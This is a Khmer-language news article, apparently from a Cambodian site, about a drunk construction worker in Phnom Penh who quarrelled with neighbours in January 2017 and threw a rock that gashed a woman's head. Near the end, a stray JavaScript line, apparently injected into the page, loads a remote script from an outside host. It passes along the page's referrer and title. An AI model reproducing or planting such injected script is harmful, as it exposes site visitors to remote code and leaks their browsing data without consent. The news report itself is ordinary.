ព្រឹតិ្តការណ៍ថ្មីៗ

មកពីផឹកសុីមានជម្លោះជាមួយជិតខាង យកថ្មម៉ាតគប់បញ្ចេញកំហឹងបែរជាត្រូវក្បាលស្ត្រីម្នាកបែករងរបួសធ្ងន់

1 ឆ្នាំ មុន 3 តូ សុផល

ភ្នំពេញៈ បុរសម្នាក់ក្រោយពីមកពីផឹកសុីមានទំនាស់ជាមួយអ្នកជិតខាងត្រូវបានសមត្ថកិច្ចចុះទៅសំរបសំរួលត្រូវគ្នាហើយមិនព្រមចូលដេកបែរជាយកដុំថ្មម៉ាតកប់បញ្ចេញកំហឹងស្រាប់តែទៅត្រូវក្បាលស្ត្រីម្នាក់រយ៉ះរងរបួសធ្ងន់ដេរអស់០៨ថ្នេរ។

ករណីនេះបង្ករភ្ញាក់ផ្អើកាលពីម៉ោង២០និង៣០នាទីយប់ថ្ងៃទី០៧
មករាឆ្នាំ២០១៧នៅចំនុចផ្ទះលេខ ១២អឹម ផ្លូវលំ ក្រុមទី០៩ ភូមិចំការឪឡឹក សង្កាត់ កាកាបខណ្ឌពោធិ៍សែនជ័យ។

ជនសង្ស័យ ឈ្មោះ សុំ សង់ ហៅសង្ហា ភេទប្រុស អាយុ២៦ឆ្នាំ មុខរបរកម្មករសំណង់ស្នាក់នៅបន្ទប់ជួលលេខ២៧ ផ្លូវលំក្រុមទី០៩ភូមិចំការឪឡឹក សង្កាត់ កាកាបខណ្ឌពោធិ៍សែនជ័យនិងមានស្រុកកំណើតភូមិព្រៃឈ្នួលឃុំរវៀងស្រុកសំរោងខេត្តតាកែវ។

ជនរងគ្រោះឈ្មោះ ឆិល សារុន ហៅបាក់ភេទ ស្រី អាយុ៤៨ឆ្នាំ
មុខរបរនៅផ្ទះ ស្នាក់នៅផ្ទះជួល ភូមិចំការឪឡឹក សង្កាត់កាកាប ខណ្ឌពោធិ៍សែនជ័យរបួសបែកក្បាលពីលើដេរចំនួន8ថ្មេរ ។

សមត្ថកិច្ចបានប្រាប់ថាមុនកើតហេតុ ជនសង្ស័យបានជឹកស្រាស្រវឹង ហើយបានទាស់សំដីគ្នាជាមួយអ្នកជិតខាងពេលឈ្លោះគ្នានោះសមត្ថកិច្ចបានទៅសំរបសំរួលត្រូវគ្នាហើយមិនព្រមចូលដេកបែរជាយកដុំថ្មម៉ាតកប់បញ្ចេញកំហឹងស្រាប់តែទៅត្រូវក្បាលស្ត្រីម្នាក់រយ៉ះរងរបួសធ្ងន់ដេរអស់០៨ថ្នេរ។

ក្រោយកើតហេតុជនបង្ករត្រូវបានសមត្ថកិច្ចឃាត់ខ្លួនយកមកធ្វើការសាកសួរនៅប៉ុស្តិ៍នគរបាលរដ្ឋបាលកាកាបនិងបានឃាត់ខ្លួនបណ្តោះអាសន្ននៅអធិការដ្ឋាននគរបាលខណ្ឌពោធិ៍សែនជ័យ។

s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

បន្ថែមយោបល់របស់អ្នក

យោបល់

 

 

ព័ត៌មានពាក់ព័ន្ធ